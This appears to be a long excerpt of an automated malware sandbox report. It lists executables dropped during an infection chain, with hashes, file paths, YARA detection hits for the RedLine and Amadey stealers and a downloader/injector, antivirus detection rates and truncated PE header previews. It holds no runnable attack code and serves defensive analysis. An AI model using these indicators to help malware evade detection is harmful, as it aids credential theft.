                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\B...............0.................. ........@.. ....................... ............@.................................X...O...................................<................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\8C99.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):250368
                                                                                                                                                                                    Entropy (8bit):6.368078764092466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l324aAQaiCam1I3zCtZf/NPPoNqgu1yGfIwHE:lDEmV7f/9ozu1yo
                                                                                                                                                                                    MD5:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    SHA1:3BCF47DF92C2ACE9DDC71C25D520E323743467BF
                                                                                                                                                                                    SHA-256:7812B5F5FD710358255D8847F61729386CB982C55BEB12A77E240D3377AAEAFB
                                                                                                                                                                                    SHA-512:BA359E439795BD1D2BD8A1B33169920DA2A348E24E68785326F59F47C0B0821EAE7D0010297C9B387313794A280D1E823FD9915DC874CF2ADA60364C6E1871F6
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L......c............................%.............@..........................0............@.................................p....................................)..@`..p...................Ta.......`..@...............d............................text............................... ..`.rdata..Z...........................@..@.data....D..........................@....rsrc...............................@..@.reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364466857316815
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:AbxUDsiH4X/Et6xXQ31UrhfSK6uVyWVYN+tGgUO:AbQOXUghSuVyWVG+7
                                                                                                                                                                                    MD5:BC45F9797F848DF442A883F994ADAD4A
                                                                                                                                                                                    SHA1:192CC4BC45C4F47147631D04A7FAFE418ACF7131
                                                                                                                                                                                    SHA-256:BEF6710DBE58CB2A400E94E471509B8BB3605EF74BA6C177F9744254AB2278E3
                                                                                                                                                                                    SHA-512:C4D4E2F53EAF779E889E86CC059C3B7A8518BB8C86E58DD0BD25D4B4683BCA59CE36AFD6E5B1CBF62E93437D08BEDA2C74AAE74ABF1AF623678B636C83461031
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L...V.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):298
                                                                                                                                                                                    Entropy (8bit):4.710444260224062
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:TM3i0b9ZjZvKtWRbtmdsfbPAxjqm1bATlAPAxB8AWLWFQ7ERTKvn:TM3i0b9BZKtWRbtmdsfbPAxjqSkpAPAk
                                                                                                                                                                                    MD5:3861A3795095FE81FCB8382D2B9066BD
                                                                                                                                                                                    SHA1:2CEF2AF9A35D636C3AF48902C20891EC49A8E791
                                                                                                                                                                                    SHA-256:B19463CB9B847BDFC7DBF8133D9702D0A0ECC4175335C4A75DB211E0196F84B3
                                                                                                                                                                                    SHA-512:8E881D7F7A8236D36AEF500473A3DBC5A98D46C1596D33AB76E4669F858D86C6B4881C0882C37D2D32B888FCAF6280385932CA5FFC6A5143D625C71B8FC8B294
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:<?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object. Permission 'storage.objects.get' denied on resource (or it may not exist).</Details></Error>
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):179200
                                                                                                                                                                                    Entropy (8bit):4.953249039785423
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:fxqZWVtaKUPLvL56dWKel5FDhBXxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOul:JqZb1SMDh
                                                                                                                                                                                    MD5:E2D0B894694E83BF28B18A634504F131
                                                                                                                                                                                    SHA1:C604AF3405093CA2E18FA33F18CFE9BA873216AC
                                                                                                                                                                                    SHA-256:3AA433E61713E35E7032EC0874523AFA5F32CA32CDAB880AFA338ED965C654C9
                                                                                                                                                                                    SHA-512:0067A2E8DE4248F3A237D09A692FF5FDC4AAB2DDE1D20328CE9F466E2E7E7BADA516915E8126C39E3D43C7224861E1DDEDB11200FF3DEABE5A5F6683DC58B61E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, Author: Joe Security
                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\B...............0.................. ........@.. ....................... ............@.................................X...O...................................<................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1034752
                                                                                                                                                                                    Entropy (8bit):7.853487844881012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:RFOWvM7bZBFpXlDpRjJ5JAXVm359Ov9UIrczuX:RguWRNpRjJPgAp9ucz
                                                                                                                                                                                    MD5:3CCD6B369EB1DDE57D181E7550BD7268
                                                                                                                                                                                    SHA1:AEE399E263C838570C00133FEAB275B81009E12A
                                                                                                                                                                                    SHA-256:F5717AEF9A4323816387603920B652A94AC0D9CEDEF36391CEDD9CDCBFEF7F60
                                                                                                                                                                                    SHA-512:00BD3BB981E2A5BD4C30241025F352E9E528D76300E67FCDBE89EE9E12ECBBA73B291AEBD9B73F73A8AAA32E2A8B2D1B4D49796CDC11A1B891A313CF0A9DCC03
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 52%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................;.Y.....Z.....L...................K.....[.....^....Rich............................PE..L....7.b.................j...,.......`............@.................................o........................................m..<................................... ................................C..@............................................text...Ph.......j.................. ..`.data....O...........n..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):543744
                                                                                                                                                                                    Entropy (8bit):7.625965227991387
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:LppXP17MEzFn2YUfF3R30bHE7LvdkhkTNd6bZNAJ:Lb14Q12CbqB6V+
                                                                                                                                                                                    MD5:25372143594B001A67BA513D615F3F49
                                                                                                                                                                                    SHA1:A7044024A257453A171EABFD52FDEF542A456145
                                                                                                                                                                                    SHA-256:DE38E5ACB3E4DED48E10CC054A47A25B95077C789BB40F4A2DCB0CF9539A14F9
                                                                                                                                                                                    SHA-512:A1A7FE3547B95E726B177B29EFE9CAAF2C163B4B88B9DE2F0D367828D3BF47B7870EFB2D3D54F23467B4CB45743820326183853FBBE23EB9AAE182B1756036BB
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................;.Y.....Z.....L...................K.....[.....^....Rich............................PE..L...S..a.................j...........`............@.......................... ......&6.......................................m..<....`.............................. ................................C..@............................................text...Ph.......j.................. ..`.data............ ...n..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364466857316815
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:AbxUDsiH4X/Et6xXQ31UrhfSK6uVyWVYN+tGgUO:AbQOXUghSuVyWVG+7
                                                                                                                                                                                    MD5:BC45F9797F848DF442A883F994ADAD4A
                                                                                                                                                                                    SHA1:192CC4BC45C4F47147631D04A7FAFE418ACF7131
                                                                                                                                                                                    SHA-256:BEF6710DBE58CB2A400E94E471509B8BB3605EF74BA6C177F9744254AB2278E3
                                                                                                                                                                                    SHA-512:C4D4E2F53EAF779E889E86CC059C3B7A8518BB8C86E58DD0BD25D4B4683BCA59CE36AFD6E5B1CBF62E93437D08BEDA2C74AAE74ABF1AF623678B636C83461031
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L...V.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364434708313012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:Yj52LUq3gX/Et6hXQ31UrhfSK6uVyuNg7tGgUO:YjqmXUghSuVyuNS7
                                                                                                                                                                                    MD5:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    SHA1:D5C992C5F3C5F14205D5E6548979190DD039460A
                                                                                                                                                                                    SHA-256:4DD88158EABF16C0F154ABCB4513042D1AEB4714ECE7A3260F089DE288B21CD5
                                                                                                                                                                                    SHA-512:285570BD404EF80B442CF397CB64E896394B2DC125EB3C4517E21224D63F2CB10DF6748881A91C6EBB2027DB082697EA7230502CE8DF103E76D8256F70BBFCF1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\6267.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....7.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364434708313012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:Yj52LUq3gX/Et6hXQ31UrhfSK6uVyuNg7tGgUO:YjqmXUghSuVyuNS7
                                                                                                                                                                                    MD5:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    SHA1:D5C992C5F3C5F14205D5E6548979190DD039460A
                                                                                                                                                                                    SHA-256:4DD88158EABF16C0F154ABCB4513042D1AEB4714ECE7A3260F089DE288B21CD5
                                                                                                                                                                                    SHA-512:285570BD404EF80B442CF397CB64E896394B2DC125EB3C4517E21224D63F2CB10DF6748881A91C6EBB2027DB082697EA7230502CE8DF103E76D8256F70BBFCF1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\65C3.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....7.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):854016
                                                                                                                                                                                    Entropy (8bit):7.6343752403592475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:OxaXQ9JRlsj4Fi2b7ernkZijKtBhjhYerTtN:CJzsj4FIrnkZtBhm
                                                                                                                                                                                    MD5:FFD6FCCF4EBA94F39A66C3AB4E1DB54E
                                                                                                                                                                                    SHA1:01F60F2F7B6E5E2E496F4D90CFECCE8A66A42E60
                                                                                                                                                                                    SHA-256:2D93CC9F714807388E6E4E8C0407AE60E401724EE638C073071432D42D946EF2
                                                                                                                                                                                    SHA-512:1FBA3EADE265059615CB7FAB731F98F135D059DCE8D07012584F14B06011036843ABCDB84754D488C567EE2B90A163944D2900F3DFFF2AC2FEA18FEE9A323B3C
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn..n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L....@.a.....................:.......?............@..........................`......].......................................t...<.......0k...................@.......................................%..@...............d............................text............................... ..`.data...|...........................@....rsrc...0k.......l..................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):215040
                                                                                                                                                                                    Entropy (8bit):6.604646966060919
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:ZXZ6F/oLW4kxBLzya57xljonXo8tA4du6moc4pmcTdWT711l:9JLBQzyaxhl+XmoPI71
                                                                                                                                                                                    MD5:25B78BEA81EFF1119CDD474FED74E295
                                                                                                                                                                                    SHA1:71E1393379DB38B5AA38588C9BCCE49D39127314
                                                                                                                                                                                    SHA-256:452D14DD8C46AE01D5B2FC19F9B4861DF5B5BA4C32E676BDD22A9EE67D40A38C
                                                                                                                                                                                    SHA-512:D043725B0EC58F99390C20E112D044F203B2EB91F18A07095BF8B62CB7C7F995BEA996463A15209993A6C8E64909194E8D90AC4FFC13BA072C7668F7EFC3020D
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................;.Y.....Z.....L...................K.....[.....^....Rich............................PE..L......b.................j...........`............@.................................oe.......................................m..<....P.............................. ................................C..@............................................text...Ph.......j.................. ..`.data................n..............@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):327680
                                                                                                                                                                                    Entropy (8bit):6.6150194846255115
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:KILOTWMBIcYBAPYDWDHdkq/7xMKaXD3cAyjEvJEMrbO:pyTWMCcYBo4AH+q/WDMAyoh
                                                                                                                                                                                    MD5:3DC3A1679199E497DC2248616FF71002
                                                                                                                                                                                    SHA1:4516C294BB2C19AE24DA878C637B129171C2B4FD
                                                                                                                                                                                    SHA-256:A692C747C8EA042770AB5879D2741CBAE5728C5382267FF03BBD411FFB0EECCD
                                                                                                                                                                                    SHA-512:BE7C2DD1C80E6A9B842F72E7D5AEF356EC7714664C3BACD4E47CC998EB014E16591C2124CDC934B767F488ECB24BF933250E6E2BBC61455AB550F88BC210F0F1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^cwx...+...+...+.P.+?..+.P.+...+.P.+m..+=.b+...+...+t..+.P.+...+.P.+...+.P.+...+Rich...+........................PE..L...6n.b............................NA............@..........................0......`.......................................D...(........"...........................................................%..@...............\............................text...*........................... ..`.data...|q.......t..................@....rsrc...."......."...t..............@..@.reloc..<i.......j..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):167642
                                                                                                                                                                                    Entropy (8bit):7.909985332353442
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:NU0Fkh7sqW0wJYQTETCqYXCqnnIDvS473XKi01hu8Rjnj+IPSoUkS:NU0FkhYv0wTETtYXhIb339gA8RjPPSoW
                                                                                                                                                                                    MD5:06203AA522589D1D25F629E63833FEDC
                                                                                                                                                                                    SHA1:5A3027210552060B00AC4E808AC1230283F43E61
                                                                                                                                                                                    SHA-256:9B5201E3F7137CF3EA2DFB93DC0117615EA33E121791D2A82ADE2BD8FEDECF64
                                                                                                                                                                                    SHA-512:A44DDCE32935D65A107094E63373B00671846049B4805F514378E026FD368624C593B3AD329645628B5A67717572FD06218E09D5B958F396DB10B95F2E2F981B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK..^..!(.{..>.xc^.V......S...ge...p=............._.k'Z)..Sg.Y...O.........._.h...7...........~. .3..+.?.S.....;..............._.h....g.b..S.........._.h...7...........^.#.L...M}/...o....q.../.4.....>W......G..{&|.I_L....g..\..K.....|...>W......K..~.3......|...>W......G.)...........{6|.+...S>....+........?......_.h..=.>h...?.L.3.|.?.%....S^....+......D
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):250368
                                                                                                                                                                                    Entropy (8bit):6.368078764092466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l324aAQaiCam1I3zCtZf/NPPoNqgu1yGfIwHE:lDEmV7f/9ozu1yo
                                                                                                                                                                                    MD5:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    SHA1:3BCF47DF92C2ACE9DDC71C25D520E323743467BF
                                                                                                                                                                                    SHA-256:7812B5F5FD710358255D8847F61729386CB982C55BEB12A77E240D3377AAEAFB
                                                                                                                                                                                    SHA-512:BA359E439795BD1D2BD8A1B33169920DA2A348E24E68785326F59F47C0B0821EAE7D0010297C9B387313794A280D1E823FD9915DC874CF2ADA60364C6E1871F6
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\8C99.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L......c............................%.............@..........................0............@.................................p....................................)..@`..p...................Ta.......`..@...............d............................text............................... ..`.rdata..Z...........................@..@.data....D..........................@....rsrc...............................@..@.reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):250368
                                                                                                                                                                                    Entropy (8bit):6.368078764092466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:l324aAQaiCam1I3zCtZf/NPPoNqgu1yGfIwHE:lDEmV7f/9ozu1yo
                                                                                                                                                                                    MD5:20F88F67297070067A7CF9A17BCD8904
                                                                                                                                                                                    SHA1:3BCF47DF92C2ACE9DDC71C25D520E323743467BF
                                                                                                                                                                                    SHA-256:7812B5F5FD710358255D8847F61729386CB982C55BEB12A77E240D3377AAEAFB
                                                                                                                                                                                    SHA-512:BA359E439795BD1D2BD8A1B33169920DA2A348E24E68785326F59F47C0B0821EAE7D0010297C9B387313794A280D1E823FD9915DC874CF2ADA60364C6E1871F6
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\8FF5.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L......c............................%.............@..........................0............@.................................p....................................)..@`..p...................Ta.......`..@...............d............................text............................... ..`.rdata..Z...........................@..@.data....D..........................@....rsrc...............................@..@.reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3909632
                                                                                                                                                                                    Entropy (8bit):7.91078654189774
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:98304:x8b7QVhgZg8gPdHoV45xAyHw0hrz3UuIUD1MBPyMnA3QX:xcSgZgPRjrHbz39dAF8
                                                                                                                                                                                    MD5:A14001B42E3E4F1199A4DA5BECED8766
                                                                                                                                                                                    SHA1:676B4F6E7C23EB0A54DE8727D3E1F296CB9F2AD6
                                                                                                                                                                                    SHA-256:F30B70E5A6634D6CEBE64C9152B54E290E548106B674A3DA2AD2E9664684B788
                                                                                                                                                                                    SHA-512:64190938E8DE82E086D6BA91E6822ADBE2D199CAF6512B42EB392B0784D01BA5268F27A9462D23C2EC14E9EF86084840A74B0A70E31F93C125C15D4A3A77991C
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\AAE1.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
